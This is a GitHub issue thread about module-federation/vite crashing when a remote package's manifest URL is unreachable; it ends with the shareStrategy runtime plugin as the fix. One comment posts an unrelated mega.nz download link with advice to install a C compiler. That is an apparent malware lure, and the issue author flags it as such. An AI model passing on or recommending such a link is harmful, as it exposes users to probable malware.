### ISSUE TITLE
Improve error handling for unavailable remote packages

### ISSUE THREAD

**Issue by pionxzh** [module-federation/vite#96]
Currently, the host application (consumer) stops executing when the remote package is not accessible. The failure to load the mf module causes the entire page to stop. Attempts to handle this error using `try-catch` and `Vue`'s `onErrorCaptured`  or `React`'s `ErrorBoundary` have been unsuccessful.

```ts
const Widget = defineAsyncComponent(() => import('@remote/pkg/Widget'))
```

### Actual Behavior

The application stops executing when the manifest URL is inaccessible. Standard error handling methods cannot catch this error.

### Expected

Provide a mechanism for users to handle the error gracefully when loading the manifest or module fails.

### Error message
```text
Error: [ Federation Runtime ]: [ Federation Runtime ]: Failed to get manifestJson for @remote/pkg. The manifest URL is http://domain.com/mf-manifest.json. Please ensure that the manifestUrl is accessible.
```

Note: The error message contains a duplicated prefix `[ Federation Runtime ]:`.

---

btw, I'm using the latest version: `1.0.0-alpha-0b760f6`

**Comment by Aljallaf100** [comment]
try this

https://mega.nz/file/1vkGlJTL#yU-SJLlIilF0mx5qwpPOd3BM8iKZqOJLEQUStR76rrQ

you may need to install the c compiler

**Comment by pionxzh** [comment]
Seems related to
https://github.com/module-federation/core/issues/2362
https://github.com/module-federation/core/issues/2672

Not sure if it's still using the same mechanism in vite.

**Comment by pionxzh** [comment]
> try this
> 
> you may need to install the c compiler

This is spamming or virus/malware. Please do not click the link.

**Comment by zhangHongEn** [comment]
> Seems related to [module-federation/core#2362](https://github.com/module-federation/core/issues/2362) [module-federation/core#2672](https://github.com/module-federation/core/issues/2672)
> 
> Not sure if it's still using the same mechanism in vite.

Does the runtime plugin mentioned in [2672](https://github.com/module-federation/core/issues/2672) work for you?

**Comment by zhangHongEn** [comment]
@pionxzh For dynamic imports, it seems there is currently no blocking issue

<img width="1151" alt="image" src="https://github.com/user-attachments/assets/99d9637b-8350-4e8d-8777-07c04b1e4169">


![image](https://github.com/user-attachments/assets/037c8560-3a44-491e-a710-0709473e938a)

**Comment by pionxzh** [comment]
The `shareStrategy` runtime plugin does solve the issue.

> For dynamic imports, it seems there is currently no blocking issue

This one does not work in my environment without the plugin. I'm not sure why.

**Comment by zhangHongEn** [comment]
@pionxzh Sorry, only in certain scenarios can it run without the runtime plugin, which was unexpected. Please ignore that. The shareStrategy runtime plugin is indeed required.
